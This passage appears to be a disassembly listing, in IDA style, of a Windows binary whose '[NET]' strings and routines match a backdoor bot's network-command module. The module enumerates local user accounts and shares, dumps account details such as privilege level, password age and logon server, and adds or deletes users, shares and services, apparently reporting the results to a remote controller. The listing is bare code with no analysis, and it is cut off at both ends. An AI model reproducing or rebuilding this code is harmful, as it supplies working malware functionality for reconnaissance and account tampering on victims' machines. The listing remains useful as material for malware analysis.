call esi ; MultiByteToWideChar
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_407B66 endp
; =============== S U B R O U T I N E =======================================
sub_407BA7 proc near ; CODE XREF: sub_411329+248�p
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_20 = dword ptr 24h
mov eax, offset loc_421F2D
call sub_417E50
push esi
xor esi, esi
cmp [esp+4+arg_10], esi
jnz short loc_407BBE
xor eax, eax
jmp short loc_407C1A
; ---------------------------------------------------------------------------
loc_407BBE: ; CODE XREF: sub_407BA7+11�j
push ebx
push ebp
push edi
mov edi, dword_4220D8
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+24h+arg_10]
mov ebx, 400h
push ebx
push esi
call edi ; WideCharToMultiByte
test byte ptr dword_43A7E8, 1
mov ebp, eax
jnz short loc_407BFF
or dword_43A7E8, 1
lea eax, [ebp+1]
push eax
mov [esp+4+arg_14], esi
call sub_4179EC
pop ecx
mov dword_43A7E4, eax
loc_407BFF: ; CODE XREF: sub_407BA7+3C�j
push esi
push esi
push ebp
push dword_43A7E4
push 0FFFFFFFFh
push [esp+14h+arg_20]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_43A7E4
pop edi
pop ebp
pop ebx
loc_407C1A: ; CODE XREF: sub_407BA7+15�j
mov ecx, [esp+4]
pop esi
mov large fs:0, ecx
leave
retn
sub_407BA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C28 proc near ; CODE XREF: sub_408363+6C�p
; sub_411650+18F�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_407B66
push [ebp+arg_4]
mov edi, eax
call sub_407B66
push 24h
push [ebp+arg_4]
mov [ebp+var_24], eax
call sub_417E80
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_407B66
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call dword_43A3A4
pop edi
leave
retn
sub_407C28 endp
; =============== S U B R O U T I N E =======================================
sub_407C93 proc near ; CODE XREF: sub_408363+20�p
; sub_411329+1BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_407B66
push [esp+8+arg_4]
mov esi, eax
call sub_407B66
pop ecx
pop ecx
push 0
push eax
push esi
call dword_43A3C0
pop esi
retn
sub_407C93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CB6 proc near ; CODE XREF: sub_408540+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_407B66
push [ebp+arg_4]
mov edi, eax
call sub_407B66
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_407B66
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_43A388
pop edi
leave
retn
sub_407CB6 endp
; =============== S U B R O U T I N E =======================================
sub_407D10 proc near ; CODE XREF: sub_408540+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_407B66
push [esp+8+arg_4]
mov esi, eax
call sub_407B66
pop ecx
pop ecx
push eax
push esi
call dword_43A48C
pop esi
retn
sub_407D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D31 proc near ; CODE XREF: sub_408540+2D�p
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_407B66
push [ebp+arg_4]
mov esi, eax
call sub_407B66
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_43A3A8
test eax, eax
mov [ebp+var_8], eax
jnz loc_4080BE
mov eax, [ebp+var_4]
test eax, eax
jz loc_4080F9
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_208]
push offset aAccountS ; "Account: %S"
push eax
call sub_416975
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_208]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_208]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_208]
push offset aCommentS ; "Comment: %S"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_407E4A
dec eax
jz short loc_407E43
dec eax
jz short loc_407E3C
mov eax, offset aUnknown ; "Unknown"
jmp short loc_407E4F
; ---------------------------------------------------------------------------
loc_407E3C: ; CODE XREF: sub_407D31+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_407E4F
; ---------------------------------------------------------------------------
loc_407E43: ; CODE XREF: sub_407D31+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_407E4F
; ---------------------------------------------------------------------------
loc_407E4A: ; CODE XREF: sub_407D31+FC�j
mov eax, offset aGuest ; "Guest"
loc_407E4F: ; CODE XREF: sub_407D31+109�j
; sub_407D31+110�j ...
push eax
lea eax, [ebp+var_208]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_208]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_208]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_208]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_208]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_208]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_208]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_208]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_208]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_208]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_208]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_208]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_208]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_208]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_208]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_416975
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D62
add esp, 20h
pop edi
pop ebx
jmp short loc_4080EA
; ---------------------------------------------------------------------------
loc_4080BE: ; CODE XREF: sub_407D31+35�j
push eax
lea eax, [ebp+var_208]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax
call sub_416975
push 0
push [ebp+arg_10]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_405D62
add esp, 20h
loc_4080EA: ; CODE XREF: sub_407D31+38B�j
cmp [ebp+var_4], 0
jz short loc_4080F9
push [ebp+var_4]
call dword_43A3F8
loc_4080F9: ; CODE XREF: sub_407D31+40�j
; sub_407D31+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_407D31 endp
; =============== S U B R O U T I N E =======================================
sub_4080FF proc near ; CODE XREF: sub_40822F+9E�p
; sub_408363:loc_4083A3�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_4081AD
jz loc_4081A6
cmp eax, 7Bh
ja short loc_408172
jz short loc_408168
cmp eax, 5
jz short loc_40815E
cmp eax, 8
jz short loc_408154
cmp eax, 32h
jz short loc_40814A
cmp eax, 35h
jz short loc_408140
cmp eax, 57h
jnz loc_4081FC
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_40821D
; ---------------------------------------------------------------------------
loc_408140: ; CODE XREF: sub_4080FF+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_40821D
; ---------------------------------------------------------------------------
loc_40814A: ; CODE XREF: sub_4080FF+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_40821D
; ---------------------------------------------------------------------------
loc_408154: ; CODE XREF: sub_4080FF+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_40821D
; ---------------------------------------------------------------------------
loc_40815E: ; CODE XREF: sub_4080FF+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_40821D
; ---------------------------------------------------------------------------
loc_408168: ; CODE XREF: sub_4080FF+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_40821D
; ---------------------------------------------------------------------------
loc_408172: ; CODE XREF: sub_4080FF+16�j
sub eax, 7Ch
jz short loc_40819F
sub eax, 7C8h
jz short loc_408198
dec eax
jz short loc_40818E
dec eax
jnz short loc_4081FC
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_40821D
; ---------------------------------------------------------------------------
loc_40818E: ; CODE XREF: sub_4080FF+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_40821D
; ---------------------------------------------------------------------------
loc_408198: ; CODE XREF: sub_4080FF+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_40819F: ; CODE XREF: sub_4080FF+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_4081A6: ; CODE XREF: sub_4080FF+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_4081AD: ; CODE XREF: sub_4080FF+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_4081E6
jz short loc_4081DF
sub eax, 8ADh
jz short loc_408211
dec eax
dec eax
jz short loc_4081D8
dec eax
jz short loc_4081D1
dec eax
dec eax
jnz short loc_4081FC
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_4081D1: ; CODE XREF: sub_4080FF+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_4081D8: ; CODE XREF: sub_4080FF+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_4081DF: ; CODE XREF: sub_4080FF+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_4081E6: ; CODE XREF: sub_4080FF+B5�j
sub eax, 8CAh
jz short loc_408218
sub eax, 17h
jz short loc_408211
sub eax, 25h
jz short loc_40820A
sub eax, 29h
jz short loc_408203
loc_4081FC: ; CODE XREF: sub_4080FF+31�j
; sub_4080FF+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_408203: ; CODE XREF: sub_4080FF+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_40820A: ; CODE XREF: sub_4080FF+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_408211: ; CODE XREF: sub_4080FF+BE�j
; sub_4080FF+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_40821D
; ---------------------------------------------------------------------------
loc_408218: ; CODE XREF: sub_4080FF+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_40821D: ; CODE XREF: sub_4080FF+3C�j
; sub_4080FF+46�j ...
push offset dword_43A7F0
call sub_416975
pop ecx
pop ecx
mov eax, offset dword_43A7F0
retn
sub_4080FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40822F proc near ; CODE XREF: sub_409848+20E5�p
var_71C = byte ptr -71Ch
var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_71C]
push eax
call sub_41804A
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call dword_4220DC ; GetComputerNameA
push esi
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_41804A
lea eax, [ebp+var_71C]
push eax
call sub_417F3E
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_71C]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call dword_43A3D0
test eax, eax
jnz short loc_4082BF
push offset aNetMessageSent ; "[NET]: Message sent successfully."
mov esi, offset dword_43A850
push esi
call sub_416975
pop ecx
pop ecx
jmp short loc_4082E6
; ---------------------------------------------------------------------------
loc_4082BF: ; CODE XREF: sub_40822F+7A�j
lea ecx, [ebp+var_71C]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_4080FF
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
mov esi, offset dword_43A850
push esi
call sub_416975
add esp, 14h
loc_4082E6: ; CODE XREF: sub_40822F+8E�j
mov eax, esi
pop esi
leave
retn
sub_40822F endp
; =============== S U B R O U T I N E =======================================
sub_4082EB proc near ; CODE XREF: sub_409848:loc_40B736�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_408341
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push dword_42ED10[esi]
push edi
push eax
call sub_40780A
add esp, 14h
test eax, eax
jnz short loc_408333
push edi
push off_42ED0C[esi]
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
loc_408323: ; CODE XREF: sub_4082EB+54�j
mov esi, offset dword_43AA50
push esi
call sub_416975
add esp, 10h
jmp short loc_40835E
; ---------------------------------------------------------------------------
loc_408333: ; CODE XREF: sub_4082EB+2A�j
call sub_4078AC
push eax
push edi
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
jmp short loc_408323
; ---------------------------------------------------------------------------
loc_408341: ; CODE XREF: sub_4082EB+C�j
lea eax, [eax+eax*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AA50
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi
call sub_416975
add esp, 0Ch
loc_40835E: ; CODE XREF: sub_4082EB+46�j
pop edi
mov eax, esi
pop esi
retn
sub_4082EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408363 proc near ; CODE XREF: sub_409848:loc_40B81A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_4083FB
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40838C
dec eax
jnz short loc_4083DB
push edi
push 0
call sub_407C93
pop ecx
pop ecx
jmp short loc_4083D7
; ---------------------------------------------------------------------------
loc_40838C: ; CODE XREF: sub_408363+18�j
cmp [ebp+arg_8], 0
jnz short loc_4083C9
push 24h
push edi
call sub_417E80
test eax, eax
pop ecx
pop ecx
jnz short loc_4083C9
push 57h
pop eax
loc_4083A3: ; CODE XREF: sub_408363+76�j
call sub_4080FF
push eax
push edi
lea eax, [esi+esi*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AC50
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi
call sub_416975
add esp, 14h
jmp short loc_40841B
; ---------------------------------------------------------------------------
loc_4083C9: ; CODE XREF: sub_408363+2D�j
; sub_408363+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_407C28
add esp, 0Ch
loc_4083D7: ; CODE XREF: sub_408363+27�j
test eax, eax
jnz short loc_4083A3
loc_4083DB: ; CODE XREF: sub_408363+1B�j
push edi
lea eax, [esi+esi*2]
push off_42ED0C[eax*4]
mov esi, offset dword_43AC50
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi
call sub_416975
add esp, 10h
jmp short loc_40841B
; ---------------------------------------------------------------------------
loc_4083FB: ; CODE XREF: sub_408363+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AC50
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi
call sub_416975
add esp, 0Ch
loc_40841B: ; CODE XREF: sub_408363+64�j
; sub_408363+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_408363 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408421 proc near ; CODE XREF: sub_409848+1FFF�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_407B66
xor esi, esi
push esi
push [ebp+arg_8]
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
mov [ebp+var_4], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_405D62
add esp, 18h
loc_40845A: ; CODE XREF: sub_408421+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call dword_43A4C4
mov ebx, eax
cmp ebx, esi
jz short loc_4084BB
cmp ebx, 0EAh
jz short loc_4084BB
push ebx
call sub_4080FF
push eax
lea eax, [ebp+var_214]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax
call sub_416975
push esi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 24h
jmp short loc_408528
; ---------------------------------------------------------------------------
loc_4084BB: ; CODE XREF: sub_408421+5D�j
; sub_408421+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_40851F
mov esi, [ebp+var_8]
add esi, 14h
loc_4084C9: ; CODE XREF: sub_408421+FA�j
push dword ptr [esi+10h]
call dword_43A4BC ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_4084E0
mov eax, offset aNo ; "No"
loc_4084E0: ; CODE XREF: sub_408421+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+var_214]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_416975
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_4084C9
xor esi, esi
loc_40851F: ; CODE XREF: sub_408421+A0�j
push [ebp+var_8]
call dword_43A3F8
loc_408528: ; CODE XREF: sub_408421+98�j
cmp ebx, 0EAh
jz loc_40845A
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_408421 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408540 proc near ; CODE XREF: sub_409848:loc_40B8BC�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_4085E3
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_408582
dec eax
jz short loc_408577
dec eax
jnz short loc_40859D
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_407D31
add esp, 14h
jmp short loc_408599
; ---------------------------------------------------------------------------
loc_408577: ; CODE XREF: sub_408540+1D�j
push ebx
push edi
call sub_407D10
pop ecx
pop ecx
jmp short loc_408599
; ---------------------------------------------------------------------------
loc_408582: ; CODE XREF: sub_408540+1A�j
cmp [ebp+arg_8], edi
jz short loc_408596
push [ebp+arg_8]
push ebx
push edi
call sub_407CB6
add esp, 0Ch
jmp short loc_408599
; ---------------------------------------------------------------------------
loc_408596: ; CODE XREF: sub_408540+45�j
push 57h
pop eax
loc_408599: ; CODE XREF: sub_408540+35�j
; sub_408540+40�j ...
cmp eax, edi
jnz short loc_4085BD
loc_40859D: ; CODE XREF: sub_408540+20�j
push ebx
lea eax, [esi+esi*2]
push off_42ED0C[eax*4]
mov esi, offset dword_43AE50
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi
call sub_416975
add esp, 10h
jmp short loc_408603
; ---------------------------------------------------------------------------
loc_4085BD: ; CODE XREF: sub_408540+5B�j
call sub_4080FF
push eax
push ebx
lea eax, [esi+esi*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AE50
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi
call sub_416975
add esp, 14h
jmp short loc_408603
; ---------------------------------------------------------------------------
loc_4085E3: ; CODE XREF: sub_408540+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AE50
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi
call sub_416975
add esp, 0Ch
loc_408603: ; CODE XREF: sub_408540+7B�j
; sub_408540+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_408540 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40860A proc near ; CODE XREF: sub_409848+20A1�p
var_21C = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_407B66
push esi
push [ebp+arg_8]
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+arg_4]
mov [ebp+var_8], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_405D62
add esp, 18h
push ebx
loc_408649: ; CODE XREF: sub_40860A+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call dword_43A39C
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_4086A8
cmp eax, 0EAh
jz short loc_4086A8
push eax
call sub_4080FF
push eax
lea eax, [ebp+var_21C]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
push eax
call sub_416975
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 24h
jmp short loc_408719
; ---------------------------------------------------------------------------
loc_4086A8: ; CODE XREF: sub_40860A+62�j
; sub_40860A+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_40872C
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_408719
loc_4086B6: ; CODE XREF: sub_40860A+E7�j
cmp edi, esi
lea eax, [ebp+var_21C]
jz short loc_4086F5
push dword ptr [edi]
push offset aS_3 ; " %S"
push eax
call sub_416975
push 1
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_4086B6
jmp short loc_408719
; ---------------------------------------------------------------------------
loc_4086F5: ; CODE XREF: sub_40860A+B4�j
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax
call sub_416975
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 1Ch
loc_408719: ; CODE XREF: sub_40860A+9C�j
; sub_40860A+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_40872C
push edi
call dword_43A3F8
xor edi, edi
mov [ebp+var_4], edi
loc_40872C: ; CODE XREF: sub_40860A+A3�j
; sub_40860A+114�j
cmp [ebp+var_10], 0EAh
jz loc_408649
cmp edi, esi
pop ebx
jz short loc_408745
push edi
call dword_43A3F8
loc_408745: ; CODE XREF: sub_40860A+132�j
push [ebp+var_C]
lea eax, [ebp+var_21C]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_416975
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_40860A endp
; =============== S U B R O U T I N E =======================================
sub_40877E proc near ; CODE XREF: sub_402B47+7�p
; sub_40402D+7D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43A434 ; inet_addr
cmp eax, 0FFFFFFFFh
